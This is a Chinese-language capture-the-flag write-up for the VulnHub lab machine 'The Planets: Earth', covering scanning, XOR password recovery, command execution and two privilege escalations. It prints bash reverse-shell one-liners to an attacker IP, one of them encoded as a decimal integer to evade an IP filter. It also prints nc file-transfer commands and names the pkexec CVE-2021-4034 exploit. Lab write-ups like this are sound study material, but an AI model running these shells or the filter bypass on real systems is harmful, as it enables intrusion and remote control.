The Planets:Earth

靶机下载

The Planets: Earth ~ VulnHub

信息收集

# nmap -sn 192.168.1.0/24 -oN live.nmap                         
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-11 09:20 CST
Nmap scan report for 192.168.1.1
Host is up (0.00036s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.1.2
Host is up (0.00024s latency).
MAC Address: 00:50:56:FE:B1:6F (VMware)
Nmap scan report for 192.168.1.85
Host is up (0.00072s latency).
MAC Address: 00:0C:29:29:1A:27 (VMware)
Nmap scan report for 192.168.1.254
Host is up (0.00014s latency).
MAC Address: 00:50:56:F8:6E:9F (VMware)
Nmap scan report for 192.168.1.60
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.97 seconds

判断到存活主机IP地址为192.168.1.85

# nmap -sT --min-rate 10000 -p- 192.168.1.85 -oN port.nmap    
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-11 09:21 CST
Nmap scan report for 192.168.1.85
Host is up (0.0064s latency).
Not shown: 65511 filtered tcp ports (no-response), 21 filtered tcp ports (host-unreach)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https
MAC Address: 00:0C:29:29:1A:27 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 15.94 seconds

开放端口信息为80,22,443,来分别对应服务为http ssh 和https;那么突破点应该就是在80和443端口上

# nmap -sT -sC -sV -O -p22,80,443 192.168.1.85 -oN details.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-11 09:21 CST
Nmap scan report for 192.168.1.85
Host is up (0.00059s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
| ssh-hostkey: 
|   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
|_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
|_http-title: Bad Request (400)
443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Test Page for the HTTP Server on Fedora
| ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
| Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
| Not valid before: 2021-10-12T23:26:31
|_Not valid after:  2031-10-10T23:26:31
| tls-alpn: 
|_  http/1.1
MAC Address: 00:0C:29:29:1A:27 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc
Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), Synology DiskStation Manager 5.X (90%), Netgear RAIDiator 4.X (87%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:netgear:raidiator:4.2.28
Aggressive OS guesses: Linux 4.15 - 5.8 (97%), Linux 5.0 - 5.4 (97%), Linux 5.0 - 5.5 (95%), Linux 5.4 (91%), Linux 2.6.32 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.9 (91%), Linux 3.4 - 3.10 (91%), Linux 5.1 (91%), Linux 2.6.32 - 3.10 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

服务的详细信息探测结果为:80端口上的http是Apache 2.4.51 (Fedora) 还出现了DNS的相关信息;

# nmap -sT --script=vuln -p22,80,443 192.168.1.85 -oN vuln.nmap 
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-11 09:22 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.85
Host is up (0.00039s latency).

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-trace: TRACE is enabled
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
|_http-csrf: Couldn't find any CSRF vulnerabilities.
443/tcp open  https
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|_  /icons/: Potentially interesting folder w/ directory listing
MAC Address: 00:0C:29:29:1A:27 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 93.53 seconds

默认漏洞脚本的信息探测没什么价值;还是从80端口和443端口寻找立足点;

渗透测试

首页80和443端口上的界面是一样的:

The Planets:Earth_第1张图片

尝试进行目录扫描:

The Planets:Earth_第2张图片

The Planets:Earth_第3张图片

目录扫描的结果还是没什么有价值的东西~

nikto进行初步的漏洞扫描,同样也是没什么发现:

The Planets:Earth_第4张图片

搜索公开的漏洞:Fedora 、mod_wsgi等:

The Planets:Earth_第5张图片

不符合我们的Apache,这里不是系统吧?

发现了一个信息泄露的漏洞;但是看到信息收集的443端口 http-title是test page... 于是重新访问443端口上的服务:

The Planets:Earth_第6张图片

后面想起来上面看到了两个域名,尝试修改/etc/hosts文件!

192.168.1.85 earth.local terratest.earth.local

再次尝试去访问:

The Planets:Earth_第7张图片

The Planets:Earth_第8张图片

80 和 443端口上看到了服务~ 看到了80端口上的回显内容比较多,让输入一个message和message key~ 暂时没能联想到什么漏洞点,输入了message和message key之后,点击send之后,下方会回显给previous messages!

再次进行两个端口上的目录扫描:

The Planets:Earth_第9张图片

The Planets:Earth_第10张图片

看https的robots文件:

The Planets:Earth_第11张图片

下面看到了testingnotes.* 随便访问txt后缀,回显:

The Planets:Earth_第12张图片

The Planets:Earth_第13张图片

发现两个信息:testdata是用来测试加密的;加密的方式是异或;terra用作管理门户的账号!

The Planets:Earth_第14张图片

将testdata里面的内容作为key尝试进行解密,80端口上最开始的三段密文!其中第一段得到了:

The Planets:Earth_第15张图片

重复的字符串earthclimatechangebad4humans,判断为密码,尝试登录!

The Planets:Earth_第16张图片

可以命令执行~ 这里就可以写反弹shell。先尝试一下ssh是否能够登陆上去!如果可以的话,那么拿到的权限应该是比较高的!

The Planets:Earth_第17张图片

失败了,只能是反弹shell了。

bash -i >& /dev/tcp/192.168.1.60/4444 0>&1

The Planets:Earth_第18张图片

禁止远程连接~ 尝试直接查看flag文件,但是在earth的家目录没找到flag;利用find命令进行查找:

The Planets:Earth_第19张图片

The Planets:Earth_第20张图片

成功读取到flag文件;但是反弹shell一直无法实现,于是翻网站的文件发现了forms.py文件,对IP地址进行了限制!

The Planets:Earth_第21张图片

其中的代码:

for potential_ip in re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', value):
            try:
                ip_address(potential_ip)
            except:
                pass
            else:
                raise ValidationError('Remote connections are forbidden.')

利用正则表达式,查询了value中是否存在1-3的数字然后后面接着点号,重复四次!因此这里尝试将IP地址转化为数字,再次进行反弹!数字转IP地址|IP地址转数字|域名转数字IP地址|数字IP地理位置查询-站长工具

The Planets:Earth_第22张图片

bash -i >& /dev/tcp/3232235836/4444 0>&1

The Planets:Earth_第23张图片

成功收到shell!

提权

提权方式一:pkexec

当前用户为apache用户,权限比较低;查看suid权限的文件:

The Planets:Earth_第24张图片

发现pkexec,尝试利用CVE-2021-4034漏洞!

The Planets:Earth_第25张图片

提权成功~ 读取根目录下面的flag文件:

The Planets:Earth_第26张图片

提权方式二:resetroot

同样还是看到了suid文件,发现了一个文件是:

The Planets:Earth_第27张图片

reset_root文件,利用strings查看该文件中的可识别字符串:

The Planets:Earth_第28张图片

重置靶机的root账号的密码!直接执行之后,利用该密码切换到root用户!

发现执行失败了,尝试将文件下载下来:

nc -lvnp 6666 > reset_root    #kali接受文件
nc 192.168.1.60 6666 < /usr/bin/reset_root		#靶机利用nc连接
#安装strace进行进程跟踪
strace ./reset_root

The Planets:Earth_第29张图片

发现缺少了三个文件,在靶机上创建这三个文件之后再次执行!

The Planets:Earth_第30张图片

创建完成之后,执行便可以重置密码!

The Planets:Earth_第31张图片

你可能感兴趣的:(Vulnhub,网络安全,web安全,安全,安全威胁分析,学习)